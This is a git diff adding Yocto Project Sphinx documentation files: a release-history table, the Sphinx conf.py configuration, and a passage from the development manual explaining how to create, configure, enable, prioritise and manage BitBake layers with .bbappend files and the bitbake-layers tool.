+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/conf.py b/documentation/conf.py
new file mode 100644
index 0000000000..e9078e054e
--- /dev/null
+++ b/documentation/conf.py
@@ -0,0 +1,151 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# SPDX-License-Identifier: CC-BY-SA-2.0-UK
+#
+# This file only contains a selection of the most common options. For a full
+# list see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Path setup --------------------------------------------------------------
+
+# If extensions (or modules to document with autodoc) are in another directory,
+# add these directories to sys.path here. If the directory is relative to the
+# documentation root, use os.path.abspath to make it absolute, like shown here.
+#
+import os
+import sys
+import datetime
+try:
+    import yaml
+except ImportError:
+    sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
+    \nPlease make sure to install pyyaml python package.\n")
+    sys.exit(1)
+
+# current_version = "dev"
+# bitbake_version = "" # Leave empty for development branch
+# Obtain versions from poky.yaml instead
+with open("poky.yaml") as data:
+    buff = data.read()
+    subst_vars = yaml.safe_load(buff)
+    if "DOCCONF_VERSION" not in subst_vars:
+        sys.stderr.write("Please set DOCCONF_VERSION in poky.yaml")
+        sys.exit(1)
+    current_version = subst_vars["DOCCONF_VERSION"]
+    if "BITBAKE_SERIES" not in subst_vars:
+        sys.stderr.write("Please set BITBAKE_SERIES in poky.yaml")
+        sys.exit(1)
+    bitbake_version = subst_vars["BITBAKE_SERIES"]
+
+# String used in sidebar
+version = 'Version: ' + current_version
+if current_version == 'dev':
+    version = 'Version: Current Development'
+# Version seen in documentation_options.js and hence in js switchers code
+release = current_version
+
+
+# -- Project information -----------------------------------------------------
+project = 'The Yocto Project \xae'
+copyright = '2010-%s, The Linux Foundation' % datetime.datetime.now().year
+author = 'The Linux Foundation'
+
+# -- General configuration ---------------------------------------------------
+
+# to load local extension from the folder 'sphinx'
+sys.path.insert(0, os.path.abspath('sphinx'))
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+    'sphinx.ext.autosectionlabel',
+    'sphinx.ext.extlinks',
+    'sphinx.ext.intersphinx',
+    'yocto-vars'
+]
+autosectionlabel_prefix_document = True
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'boilerplate.rst']
+
+# master document name. The default changed from contents to index. so better
+# set it ourselves.
+master_doc = 'index'
+
+# create substitution for project configuration variables
+rst_prolog = """
+.. |project_name| replace:: %s
+.. |copyright| replace:: %s
+.. |author| replace:: %s
+""" % (project, copyright, author)
+
+# external links and substitutions
+extlinks = {
+    'yocto_home': ('https://yoctoproject.org%s', None),
+    'yocto_wiki': ('https://wiki.yoctoproject.org%s', None),
+    'yocto_dl': ('https://downloads.yoctoproject.org%s', None),
+    'yocto_lists': ('https://lists.yoctoproject.org%s', None),
+    'yocto_bugs': ('https://bugzilla.yoctoproject.org%s', None),
+    'yocto_ab': ('https://autobuilder.yoctoproject.org%s', None),
+    'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+    'yocto_git': ('https://git.yoctoproject.org%s', None),
+    'oe_home': ('https://www.openembedded.org%s', None),
+    'oe_lists': ('https://lists.openembedded.org%s', None),
+    'oe_git': ('https://git.openembedded.org%s', None),
+}
+
+# Intersphinx config to use cross reference with Bitbake user manual
+intersphinx_mapping = {
+    'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None)
+}
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages.  See the documentation for
+# a list of builtin themes.
+#
+try:
+    import sphinx_rtd_theme
+    html_theme = 'sphinx_rtd_theme'
+    html_theme_options = {
+        'sticky_navigation': False,
+    }
+except ImportError:
+    sys.stderr.write("The Sphinx sphinx_rtd_theme HTML theme was not found.\
+    \nPlease make sure to install the sphinx_rtd_theme python package.\n")
+    sys.exit(1)
+
+html_logo = 'sphinx-static/YoctoProject_Logo_RGB.jpg'
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['sphinx-static']
+
+html_context = {
+    'current_version': current_version,
+}
+
+# Add customm CSS and JS files
+html_css_files = ['theme_overrides.css']
+html_js_files = ['switchers.js']
+
+# Hide 'Created using Sphinx' text
+html_show_sphinx = False
+
+# Add 'Last updated' on each page
+html_last_updated_fmt = '%b %d, %Y'
+
+# Remove the trailing 'dot' in section numbers
+html_secnumber_suffix = " "
+
+latex_elements = {
+    'passoptionstopackages': '\PassOptionsToPackage{bookmarksdepth=5}{hyperref}',
+    'preamble': '\setcounter{tocdepth}{2}',
+}
diff --git a/documentation/dev-manual/dev-manual-common-tasks.rst b/documentation/dev-manual/dev-manual-common-tasks.rst
new file mode 100644
index 0000000000..d1dde6d0f3
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-common-tasks.rst
@@ -0,0 +1,11683 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Common Tasks
+************
+
+This chapter describes fundamental procedures such as creating layers,
+adding new software packages, extending or customizing images, porting
+work to new hardware (adding a new machine), and so forth. You will find
+that the procedures documented here occur often in the development cycle
+using the Yocto Project.
+
+Understanding and Creating Layers
+=================================
+
+The OpenEmbedded build system supports organizing
+:term:`Metadata` into multiple layers.
+Layers allow you to isolate different types of customizations from each
+other. For introductory information on the Yocto Project Layer Model,
+see the
+":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+section in the Yocto Project Overview and Concepts Manual.
+
+Creating Your Own Layer
+-----------------------
+
+It is very easy to create your own layers to use with the OpenEmbedded
+build system. The Yocto Project ships with tools that speed up creating
+layers. This section describes the steps you perform by hand to create
+layers so that you can better understand them. For information about the
+layer-creation tools, see the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section in the Yocto Project Board Support Package (BSP) Developer's
+Guide and the ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+section further down in this manual.
+
+Follow these general steps to create your layer without using tools:
+
+1. *Check Existing Layers:* Before creating a new layer, you should be
+   sure someone has not already created a layer containing the Metadata
+   you need. You can see the `OpenEmbedded Metadata
+   Index <https://layers.openembedded.org/layerindex/layers/>`__ for a
+   list of layers from the OpenEmbedded community that can be used in
+   the Yocto Project. You could find a layer that is identical or close
+   to what you need.
+
+2. *Create a Directory:* Create the directory for your layer. When you
+   create the layer, be sure to create the directory in an area not
+   associated with the Yocto Project :term:`Source Directory`
+   (e.g. the cloned ``poky`` repository).
+
+   While not strictly required, prepend the name of the directory with
+   the string "meta-". For example:
+   ::
+
+      meta-mylayer
+      meta-GUI_xyz
+      meta-mymachine
+
+   With rare exceptions, a layer's name follows this form:
+   ::
+
+      meta-root_name
+
+   Following this layer naming convention can save
+   you trouble later when tools, components, or variables "assume" your
+   layer name begins with "meta-". A notable example is in configuration
+   files as shown in the following step where layer names without the
+   "meta-" string are appended to several variables used in the
+   configuration.
+
+3. *Create a Layer Configuration File:* Inside your new layer folder,
+   you need to create a ``conf/layer.conf`` file. It is easiest to take
+   an existing layer configuration file and copy that to your layer's
+   ``conf`` directory and then modify the file as needed.
+
+   The ``meta-yocto-bsp/conf/layer.conf`` file in the Yocto Project
+   :yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf>`
+   demonstrates the required syntax. For your layer, you need to replace
+   "yoctobsp" with a unique identifier for your layer (e.g. "machinexyz"
+   for a layer named "meta-machinexyz"):
+   ::
+
+      # We have a conf and classes directory, add to BBPATH
+      BBPATH .= ":${LAYERDIR}"
+
+      # We have recipes-* directories, add to BBFILES
+      BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+                  ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+      BBFILE_COLLECTIONS += "yoctobsp"
+      BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
+      BBFILE_PRIORITY_yoctobsp = "5"
+      LAYERVERSION_yoctobsp = "4"
+      LAYERSERIES_COMPAT_yoctobsp = "dunfell"
+
+   Following is an explanation of the layer configuration file:
+
+   -  :term:`BBPATH`: Adds the layer's
+      root directory to BitBake's search path. Through the use of the
+      ``BBPATH`` variable, BitBake locates class files (``.bbclass``),
+      configuration files, and files that are included with ``include``
+      and ``require`` statements. For these cases, BitBake uses the
+      first file that matches the name found in ``BBPATH``. This is
+      similar to the way the ``PATH`` variable is used for binaries. It
+      is recommended, therefore, that you use unique class and
+      configuration filenames in your custom layer.
+
+   -  :term:`BBFILES`: Defines the
+      location for all recipes in the layer.
+
+   -  :term:`BBFILE_COLLECTIONS`:
+      Establishes the current layer through a unique identifier that is
+      used throughout the OpenEmbedded build system to refer to the
+      layer. In this example, the identifier "yoctobsp" is the
+      representation for the container layer named "meta-yocto-bsp".
+
+   -  :term:`BBFILE_PATTERN`:
+      Expands immediately during parsing to provide the directory of the
+      layer.
+
+   -  :term:`BBFILE_PRIORITY`:
+      Establishes a priority to use for recipes in the layer when the
+      OpenEmbedded build finds recipes of the same name in different
+      layers.
+
+   -  :term:`LAYERVERSION`:
+      Establishes a version number for the layer. You can use this
+      version number to specify this exact version of the layer as a
+      dependency when using the
+      :term:`LAYERDEPENDS`
+      variable.
+
+   -  :term:`LAYERDEPENDS`:
+      Lists all layers on which this layer depends (if any).
+
+   -  :term:`LAYERSERIES_COMPAT`:
+      Lists the :yocto_wiki:`Yocto Project </wiki/Releases>`
+      releases for which the current version is compatible. This
+      variable is a good way to indicate if your particular layer is
+      current.
+
+4. *Add Content:* Depending on the type of layer, add the content. If
+   the layer adds support for a machine, add the machine configuration
+   in a ``conf/machine/`` file within the layer. If the layer adds
+   distro policy, add the distro configuration in a ``conf/distro/``
+   file within the layer. If the layer introduces new recipes, put the
+   recipes you need in ``recipes-*`` subdirectories within the layer.
+
+   .. note::
+
+      For an explanation of layer hierarchy that is compliant with the
+      Yocto Project, see the ":ref:`bsp-guide/bsp:example filesystem layout`"
+      section in the Yocto Project Board Support Package (BSP) Developer's Guide.
+
+5. *Optionally Test for Compatibility:* If you want permission to use
+   the Yocto Project Compatibility logo with your layer or application
+   that uses your layer, perform the steps to apply for compatibility.
+   See the "`Making Sure Your Layer is Compatible With Yocto
+   Project <#making-sure-your-layer-is-compatible-with-yocto-project>`__"
+   section for more information.
+
+.. _best-practices-to-follow-when-creating-layers:
+
+Following Best Practices When Creating Layers
+---------------------------------------------
+
+To create layers that are easier to maintain and that will not impact
+builds for other machines, you should consider the information in the
+following list:
+
+-  *Avoid "Overlaying" Entire Recipes from Other Layers in Your
+   Configuration:* In other words, do not copy an entire recipe into
+   your layer and then modify it. Rather, use an append file
+   (``.bbappend``) to override only those parts of the original recipe
+   you need to modify.
+
+-  *Avoid Duplicating Include Files:* Use append files (``.bbappend``)
+   for each recipe that uses an include file. Or, if you are introducing
+   a new recipe that requires the included file, use the path relative
+   to the original layer directory to refer to the file. For example,
+   use ``require recipes-core/``\ `package`\ ``/``\ `file`\ ``.inc`` instead
+   of ``require`` `file`\ ``.inc``. If you're finding you have to overlay
+   the include file, it could indicate a deficiency in the include file
+   in the layer to which it originally belongs. If this is the case, you
+   should try to address that deficiency instead of overlaying the
+   include file. For example, you could address this by getting the
+   maintainer of the include file to add a variable or variables to make
+   it easy to override the parts needing to be overridden.
+
+-  *Structure Your Layers:* Proper use of overrides within append files
+   and placement of machine-specific files within your layer can ensure
+   that a build is not using the wrong Metadata and negatively impacting
+   a build for a different machine. Following are some examples:
+
+   -  *Modify Variables to Support a Different Machine:* Suppose you
+      have a layer named ``meta-one`` that adds support for building
+      machine "one". To do so, you use an append file named
+      ``base-files.bbappend`` and create a dependency on "foo" by
+      altering the :term:`DEPENDS`
+      variable:
+      ::
+
+         DEPENDS = "foo"
+
+      The dependency is created during any
+      build that includes the layer ``meta-one``. However, you might not
+      want this dependency for all machines. For example, suppose you
+      are building for machine "two" but your ``bblayers.conf`` file has
+      the ``meta-one`` layer included. During the build, the
+      ``base-files`` for machine "two" will also have the dependency on
+      ``foo``.
+
+      To make sure your changes apply only when building machine "one",
+      use a machine override with the ``DEPENDS`` statement:
+      ::
+
+         DEPENDS_one = "foo"
+
+      You should follow the same strategy when using ``_append``
+      and ``_prepend`` operations:
+      ::
+
+         DEPENDS_append_one = " foo"
+         DEPENDS_prepend_one = "foo "
+
+      As an actual example, here's a
+      snippet from the generic kernel include file ``linux-yocto.inc``,
+      wherein the kernel compile and link options are adjusted in the
+      case of a subset of the supported architectures:
+      ::
+
+         DEPENDS_append_aarch64 = " libgcc"
+         KERNEL_CC_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
+         KERNEL_LD_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
+
+         DEPENDS_append_nios2 = " libgcc"
+         KERNEL_CC_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
+         KERNEL_LD_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
+
+         DEPENDS_append_arc = " libgcc"
+         KERNEL_CC_append_arc = " ${TOOLCHAIN_OPTIONS}"
+         KERNEL_LD_append_arc = " ${TOOLCHAIN_OPTIONS}"
+
+         KERNEL_FEATURES_append_qemuall=" features/debug/printk.scc"
+
+      .. note::
+
+         Avoiding "+=" and "=+" and using machine-specific ``_append``
+         and ``_prepend`` operations is recommended as well.
+
+   -  *Place Machine-Specific Files in Machine-Specific Locations:* When
+      you have a base recipe, such as ``base-files.bb``, that contains a
+      :term:`SRC_URI` statement to a
+      file, you can use an append file to cause the build to use your
+      own version of the file. For example, an append file in your layer
+      at ``meta-one/recipes-core/base-files/base-files.bbappend`` could
+      extend :term:`FILESPATH` using :term:`FILESEXTRAPATHS` as follows:
+      ::
+
+         FILESEXTRAPATHS_prepend := "${THISDIR}/${BPN}:"
+
+      The build for machine "one" will pick up your machine-specific file as
+      long as you have the file in
+      ``meta-one/recipes-core/base-files/base-files/``. However, if you
+      are building for a different machine and the ``bblayers.conf``
+      file includes the ``meta-one`` layer and the location of your
+      machine-specific file is the first location where that file is
+      found according to ``FILESPATH``, builds for all machines will
+      also use that machine-specific file.
+
+      You can make sure that a machine-specific file is used for a
+      particular machine by putting the file in a subdirectory specific
+      to the machine. For example, rather than placing the file in
+      ``meta-one/recipes-core/base-files/base-files/`` as shown above,
+      put it in ``meta-one/recipes-core/base-files/base-files/one/``.
+      Not only does this make sure the file is used only when building
+      for machine "one", but the build process locates the file more
+      quickly.
+
+      In summary, you need to place all files referenced from
+      ``SRC_URI`` in a machine-specific subdirectory within the layer in
+      order to restrict those files to machine-specific builds.
+
+-  *Perform Steps to Apply for Yocto Project Compatibility:* If you want
+   permission to use the Yocto Project Compatibility logo with your
+   layer or application that uses your layer, perform the steps to apply
+   for compatibility. See the "`Making Sure Your Layer is Compatible
+   With Yocto
+   Project <#making-sure-your-layer-is-compatible-with-yocto-project>`__"
+   section for more information.
+
+-  *Follow the Layer Naming Convention:* Store custom layers in a Git
+   repository that use the ``meta-layer_name`` format.
+
+-  *Group Your Layers Locally:* Clone your repository alongside other
+   cloned ``meta`` directories from the :term:`Source Directory`.
+
+Making Sure Your Layer is Compatible With Yocto Project
+-------------------------------------------------------
+
+When you create a layer used with the Yocto Project, it is advantageous
+to make sure that the layer interacts well with existing Yocto Project
+layers (i.e. the layer is compatible with the Yocto Project). Ensuring
+compatibility makes the layer easy to be consumed by others in the Yocto
+Project community and could allow you permission to use the Yocto
+Project Compatible Logo.
+
+.. note::
+
+   Only Yocto Project member organizations are permitted to use the
+   Yocto Project Compatible Logo. The logo is not available for general
+   use. For information on how to become a Yocto Project member
+   organization, see the :yocto_home:`Yocto Project Website <>`.
+
+The Yocto Project Compatibility Program consists of a layer application
+process that requests permission to use the Yocto Project Compatibility
+Logo for your layer and application. The process consists of two parts:
+
+1. Successfully passing a script (``yocto-check-layer``) that when run
+   against your layer, tests it against constraints based on experiences
+   of how layers have worked in the real world and where pitfalls have
+   been found. Getting a "PASS" result from the script is required for
+   successful compatibility registration.
+
+2. Completion of an application acceptance form, which you can find at
+   https://www.yoctoproject.org/webform/yocto-project-compatible-registration.
+
+To be granted permission to use the logo, you need to satisfy the
+following:
+
+-  Be able to check the box indicating that you got a "PASS" when
+   running the script against your layer.
+
+-  Answer "Yes" to the questions on the form or have an acceptable
+   explanation for any questions answered "No".
+
+-  Be a Yocto Project Member Organization.
+
+The remainder of this section presents information on the registration
+form and on the ``yocto-check-layer`` script.
+
+Yocto Project Compatible Program Application
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Use the form to apply for your layer's approval. Upon successful
+application, you can use the Yocto Project Compatibility Logo with your
+layer and the application that uses your layer.
+
+To access the form, use this link:
+https://www.yoctoproject.org/webform/yocto-project-compatible-registration.
+Follow the instructions on the form to complete your application.
+
+The application consists of the following sections:
+
+-  *Contact Information:* Provide your contact information as the fields
+   require. Along with your information, provide the released versions
+   of the Yocto Project for which your layer is compatible.
+
+-  *Acceptance Criteria:* Provide "Yes" or "No" answers for each of the
+   items in the checklist. Space exists at the bottom of the form for
+   any explanations for items for which you answered "No".
+
+-  *Recommendations:* Provide answers for the questions regarding Linux
+   kernel use and build success.
+
+``yocto-check-layer`` Script
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``yocto-check-layer`` script provides you a way to assess how
+compatible your layer is with the Yocto Project. You should run this
+script prior to using the form to apply for compatibility as described
+in the previous section. You need to achieve a "PASS" result in order to
+have your application form successfully processed.
+
+The script divides tests into three areas: COMMON, BSP, and DISTRO. For
+example, given a distribution layer (DISTRO), the layer must pass both
+the COMMON and DISTRO related tests. Furthermore, if your layer is a BSP
+layer, the layer must pass the COMMON and BSP set of tests.
+
+To execute the script, enter the following commands from your build
+directory:
+::
+
+   $ source oe-init-build-env
+   $ yocto-check-layer your_layer_directory
+
+Be sure to provide the actual directory for your
+layer as part of the command.
+
+Entering the command causes the script to determine the type of layer
+and then to execute a set of specific tests against the layer. The
+following list overviews the test:
+
+-  ``common.test_readme``: Tests if a ``README`` file exists in the
+   layer and the file is not empty.
+
+-  ``common.test_parse``: Tests to make sure that BitBake can parse the
+   files without error (i.e. ``bitbake -p``).
+
+-  ``common.test_show_environment``: Tests that the global or per-recipe
+   environment is in order without errors (i.e. ``bitbake -e``).
+
+-  ``common.test_world``: Verifies that ``bitbake world`` works.
+
+-  ``common.test_signatures``: Tests to be sure that BSP and DISTRO
+   layers do not come with recipes that change signatures.
+
+-  ``common.test_layerseries_compat``: Verifies layer compatibility is
+   set properly.
+
+-  ``bsp.test_bsp_defines_machines``: Tests if a BSP layer has machine
+   configurations.
+
+-  ``bsp.test_bsp_no_set_machine``: Tests to ensure a BSP layer does not
+   set the machine when the layer is added.
+
+-  ``bsp.test_machine_world``: Verifies that ``bitbake world`` works
+   regardless of which machine is selected.
+
+-  ``bsp.test_machine_signatures``: Verifies that building for a
+   particular machine affects only the signature of tasks specific to
+   that machine.
+
+-  ``distro.test_distro_defines_distros``: Tests if a DISTRO layer has
+   distro configurations.
+
+-  ``distro.test_distro_no_set_distros``: Tests to ensure a DISTRO layer
+   does not set the distribution when the layer is added.
+
+Enabling Your Layer
+-------------------
+
+Before the OpenEmbedded build system can use your new layer, you need to
+enable it. To enable your layer, simply add your layer's path to the
+``BBLAYERS`` variable in your ``conf/bblayers.conf`` file, which is
+found in the :term:`Build Directory`.
+The following example shows how to enable a layer named
+``meta-mylayer``:
+::
+
+   # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
+   # changes incompatibly
+   POKY_BBLAYERS_CONF_VERSION = "2"
+   BBPATH = "${TOPDIR}"
+   BBFILES ?= ""
+   BBLAYERS ?= " \
+       /home/user/poky/meta \
+       /home/user/poky/meta-poky \
+       /home/user/poky/meta-yocto-bsp \
+       /home/user/poky/meta-mylayer \
+       "
+
+BitBake parses each ``conf/layer.conf`` file from the top down as
+specified in the ``BBLAYERS`` variable within the ``conf/bblayers.conf``
+file. During the processing of each ``conf/layer.conf`` file, BitBake
+adds the recipes, classes and configurations contained within the
+particular layer to the source directory.
+
+.. _using-bbappend-files:
+
+Using .bbappend Files in Your Layer
+-----------------------------------
+
+A recipe that appends Metadata to another recipe is called a BitBake
+append file. A BitBake append file uses the ``.bbappend`` file type
+suffix, while the corresponding recipe to which Metadata is being
+appended uses the ``.bb`` file type suffix.
+
+You can use a ``.bbappend`` file in your layer to make additions or
+changes to the content of another layer's recipe without having to copy
+the other layer's recipe into your layer. Your ``.bbappend`` file
+resides in your layer, while the main ``.bb`` recipe file to which you
+are appending Metadata resides in a different layer.
+
+Being able to append information to an existing recipe not only avoids
+duplication, but also automatically applies recipe changes from a
+different layer into your layer. If you were copying recipes, you would
+have to manually merge changes as they occur.
+
+When you create an append file, you must use the same root name as the
+corresponding recipe file. For example, the append file
+``someapp_3.1.bbappend`` must apply to ``someapp_3.1.bb``. This
+means the original recipe and append file names are version
+number-specific. If the corresponding recipe is renamed to update to a
+newer version, you must also rename and possibly update the
+corresponding ``.bbappend`` as well. During the build process, BitBake
+displays an error on starting if it detects a ``.bbappend`` file that
+does not have a corresponding recipe with a matching name. See the
+:term:`BB_DANGLINGAPPENDS_WARNONLY`
+variable for information on how to handle this error.
+
+As an example, consider the main formfactor recipe and a corresponding
+formfactor append file both from the :term:`Source Directory`.
+Here is the main
+formfactor recipe, which is named ``formfactor_0.0.bb`` and located in
+the "meta" layer at ``meta/recipes-bsp/formfactor``:
+::
+
+   SUMMARY = "Device formfactor information"
+   DESCRIPTION = "A formfactor configuration file provides information about the \
+   target hardware for which the image is being built and information that the \
+   build system cannot obtain from other sources such as the kernel."
+   SECTION = "base"
+   LICENSE = "MIT"
+   LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+   PR = "r45"
+
+   SRC_URI = "file://config file://machconfig"
+   S = "${WORKDIR}"
+
+   PACKAGE_ARCH = "${MACHINE_ARCH}"
+   INHIBIT_DEFAULT_DEPS = "1"
+
+   do_install() {
+	   # Install file only if it has contents
+           install -d ${D}${sysconfdir}/formfactor/
+           install -m 0644 ${S}/config ${D}${sysconfdir}/formfactor/
+	   if [ -s "${S}/machconfig" ]; then
+	           install -m 0644 ${S}/machconfig ${D}${sysconfdir}/formfactor/
+	   fi
+   }
+
+In the main recipe, note the :term:`SRC_URI`
+variable, which tells the OpenEmbedded build system where to find files
+during the build.
+
+Following is the append file, which is named ``formfactor_0.0.bbappend``
+and is from the Raspberry Pi BSP Layer named ``meta-raspberrypi``. The
+file is in the layer at ``recipes-bsp/formfactor``:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+By default, the build system uses the
+:term:`FILESPATH` variable to
+locate files. This append file extends the locations by setting the
+:term:`FILESEXTRAPATHS`
+variable. Setting this variable in the ``.bbappend`` file is the most
+reliable and recommended method for adding directories to the search
+path used by the build system to find files.
+
+The statement in this example extends the directories to include
+``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``,
+which resolves to a directory named ``formfactor`` in the same directory
+in which the append file resides (i.e.
+``meta-raspberrypi/recipes-bsp/formfactor``. This implies that you must
+have the supporting directory structure set up that will contain any
+files or patches you will be including from the layer.
+
+Using the immediate expansion assignment operator ``:=`` is important
+because of the reference to ``THISDIR``. The trailing colon character is
+important as it ensures that items in the list remain colon-separated.
+
+.. note::
+
+   BitBake automatically defines the ``THISDIR`` variable. You should
+   never set this variable yourself. Using "_prepend" as part of the
+   ``FILESEXTRAPATHS`` ensures your path will be searched prior to other
+   paths in the final list.
+
+   Also, not all append files add extra files. Many append files simply
+   exist to add build options (e.g. ``systemd``). For these cases, your
+   append file would not even use the ``FILESEXTRAPATHS`` statement.
+
+Prioritizing Your Layer
+-----------------------
+
+Each layer is assigned a priority value. Priority values control which
+layer takes precedence if there are recipe files with the same name in
+multiple layers. For these cases, the recipe file from the layer with a
+higher priority number takes precedence. Priority values also affect the
+order in which multiple ``.bbappend`` files for the same recipe are
+applied. You can either specify the priority manually, or allow the
+build system to calculate it based on the layer's dependencies.
+
+To specify the layer's priority manually, use the
+:term:`BBFILE_PRIORITY`
+variable and append the layer's root name:
+::
+
+   BBFILE_PRIORITY_mylayer = "1"
+
+.. note::
+
+   It is possible for a recipe with a lower version number
+   :term:`PV` in a layer that has a higher
+   priority to take precedence.
+
+   Also, the layer priority does not currently affect the precedence
+   order of ``.conf`` or ``.bbclass`` files. Future versions of BitBake
+   might address this.
+
+Managing Layers
+---------------
+
+You can use the BitBake layer management tool ``bitbake-layers`` to
+provide a view into the structure of recipes across a multi-layer
+project. Being able to generate output that reports on configured layers
+with their paths and priorities and on ``.bbappend`` files and their
+applicable recipes can help to reveal potential problems.
+
+For help on the BitBake layer management tool, use the following
+command:
+::
+
+   $ bitbake-layers --help
+   NOTE: Starting bitbake server...
+   usage: bitbake-layers [-d] [-q] [-F] [--color COLOR] [-h] <subcommand> ...
+
+   BitBake layers utility
+
+   optional arguments:
+     -d, --debug           Enable debug output
+     -q, --quiet           Print only errors
+     -F, --force           Force add without recipe parse verification
+     --color COLOR         Colorize output (where COLOR is auto, always, never)
+     -h, --help            show this help message and exit
+
+   subcommands:
+     <subcommand>
+       layerindex-fetch    Fetches a layer from a layer index along with its
+                           dependent layers, and adds them to conf/bblayers.conf.
+       layerindex-show-depends
+                           Find layer dependencies from layer index.
+       add-layer           Add one or more layers to bblayers.conf.
+       remove-layer        Remove one or more layers from bblayers.conf.
+       flatten             flatten layer configuration into a separate output
+                           directory.
+       show-layers         show current configured layers.
+       show-overlayed      list overlayed recipes (where the same recipe exists
+                           in another layer)
+       show-recipes        list available recipes, showing the layer they are
+                           provided by
+       show-appends        list bbappend files and recipe files they apply to
+       show-cross-depends  Show dependencies between recipes that cross layer
+                           boundaries.
+       create-layer        Create a basic layer
+
+   Use bitbake-layers <subcommand> --help to get help on a specific command
+
+The following list describes the available commands:
+
+-  ``help:`` Displays general help or help on a specified command.
+
+-  ``show-layers:`` Shows the current configured layers.
+
+-  ``show-overlayed:`` Lists overlayed recipes. A recipe is overlayed
+   when a recipe with the same name exists in another layer that has a
+   higher layer priority.
+
+-  ``show-recipes:`` Lists available recipes and the layers that
+   provide them.
+
+-  ``show-appends:`` Lists ``.bbappend`` files and the recipe files to
+   which they apply.
+
+-  ``show-cross-depends:`` Lists dependency relationships between
+   recipes that cross layer boundaries.
+
+-  ``add-layer:`` Adds a layer to ``bblayers.conf``.
+
+-  ``remove-layer:`` Removes a layer from ``bblayers.conf``
+
+-  ``flatten:`` Flattens the layer configuration into a separate
+   output directory. Flattening your layer configuration builds a
+   "flattened" directory that contains the contents of all layers, with
+   any overlayed recipes removed and any ``.bbappend`` files appended to
+   the corresponding recipes. You might have to perform some manual
+   cleanup of the flattened layer as follows:
+
+   -  Non-recipe files (such as patches) are overwritten. The flatten
+      command shows a warning for these files.
+
+   -  Anything beyond the normal layer setup has been added to the
+      ``layer.conf`` file. Only the lowest priority layer's
+      ``layer.conf`` is used.
+
+   -  Overridden and appended items from ``.bbappend`` files need to be
+      cleaned up. The contents of each ``.bbappend`` end up in the
+      flattened recipe. However, if there are appended or changed
+      variable values, you need to tidy these up yourself. Consider the
+      following example. Here, the ``bitbake-layers`` command adds the
+      line ``#### bbappended ...`` so that you know where the following
+      lines originate:
+      ::
+
+         ...
+         DESCRIPTION = "A useful utility"
+         ...
+         EXTRA_OECONF = "--enable-something"
+         ...
+
+         #### bbappended from meta-anotherlayer ####
+
+         DESCRIPTION = "Customized utility"
+         EXTRA_OECONF += "--enable-somethingelse"
+
+
+      Ideally, you would tidy up these utilities as follows:
+      ::
+
+         ...
+         DESCRIPTION = "Customized utility"
+         ...
+         EXTRA_OECONF = "--enable-something --enable-somethingelse"
+         ...
+
+-  ``layerindex-fetch``: Fetches a layer from a layer index, along
+   with its dependent layers, and adds the layers to the
+   ``conf/bblayers.conf`` file.
+
+-  ``layerindex-show-depends``: Finds layer dependencies from the
+   layer index.
+
+-  ``create-layer``: Creates a basic layer.
+
+Creating a General Layer Using the ``bitbake-layers`` Script
+------------------------------------------------------------
+
+The ``bitbake-layers`` script with the ``create-layer`` subcommand
+simplifies creating a new general layer.
+
+.. note::
+
+   -  For information on BSP layers, see the ":ref:`bsp-guide/bsp:bsp layers`"
+      section in the Yocto
+      Project Board Specific (BSP) Developer's Guide.
+
+   -  In order to use a layer with the OpenEmbedded build system, you
+      need to add the layer to your ``bblayers.conf`` configuration
+      file. See the ":ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`"
+      section for more information.
+
+The default mode of the script's operation with this subcommand is to
+create a layer with the following:
+
+-  A layer priority of 6.
+
